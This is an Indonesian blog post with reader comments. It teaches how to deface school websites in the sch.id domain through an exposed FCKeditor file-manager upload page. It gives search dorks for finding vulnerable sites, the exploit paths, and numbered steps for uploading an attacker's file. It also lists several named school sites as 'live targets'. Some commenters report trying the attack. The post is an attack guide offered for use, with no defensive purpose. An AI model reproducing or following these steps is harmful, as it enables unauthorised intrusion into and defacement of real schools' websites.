5

cara hack / deface website sekolah ( sch.id )

Jumat, 15 November 2013
Share this Article on :


assalammualaikum wr.wb / salam sejahtera Kali Ini saya akan share cara hack website sekolah anda ( sch.id ) terlebih dahulu anda persiapkan bahan nya. . .

Bahan:
- File txt (bikin di notepad)


Dork:
inurl:/html/siswa.php?
inurl:/html/alumni.php?
inurl:/html/guru.php?


Exploit:
/editor/filemanager/connectors/test.html

/editor/filemanager/connectors/uploadtest.html

PAKAI SALAH SATU EXPLOITNYA



1. Contoh:
http://blabla.sch.id/html/siswa.php
http://blabla.sch.id/html/alumni.php
http://blabla.sch.id/html/guru.php


2. Ganti jadi:
http://blabla.sch.id/editor/filemanager/connectors/uploadtest.html

3. Ganti ASP Jadi PHP

4. masukan file txt yang sudah disiapkan (open -> upload)

5. Hasilnya:  http://xxx.sch.id/userfiles/file/nama-file.txt



Nih, buat yang males nyari langsung aja yang sudah disiapkan:



live target :
http://sdia20.sch.id/simk/atk/attributes/fck/editor/filemanager/connectors/test.html
http://www.e-learning.smpbatikska.sch.id/editor/filemanager/connectors/test.html
http://sman1kotabaru.sch.id/editor/filemanager/connectors/test.html
http://smansa-pringsewu.sch.id/editor/filemanager/connectors/test.html
http://www.smkn1kuta.sch.id/editor/filemanager/connectors/test.html
http://smp1ponjong.sch.id/editor/filemanager/connectors/test.html


Artikel Terkait:

5 komentar:

Unknown mengatakan...

gimanaa sihh msh bingung ...??

BeritaTerbaruBali mengatakan...

kgk bisa kan udah di upload bukak link nya gkk keluar malah 404

Unknown mengatakan...

mass aku uda berhasil,tapi kolo ingin buka web yg uda aku hack tadi keluar tulisan"SERVER NOT FOUNT"padahal sebelumnya pas aku akses tdk seperti itu,
apa itu namanya aku dah berhasil

Unknown mengatakan...

masih main ya gan mainan bocah ? file upload??
sql bisa kagak ? kwokwowkw ..
kalau file upload mah cuman di elu yang bisa kelihatan website itu uda di hack .. nah kalau org lain yang buka biasa aja ..

Iqbal Maulana mengatakan...

Infonya Lumyan cuman server Not Found
Jngn lupa Berkunjung y ke website Saya
http://subangcyeberteam.blogspot.co.id/
Mkasih kaka :)

Posting Komentar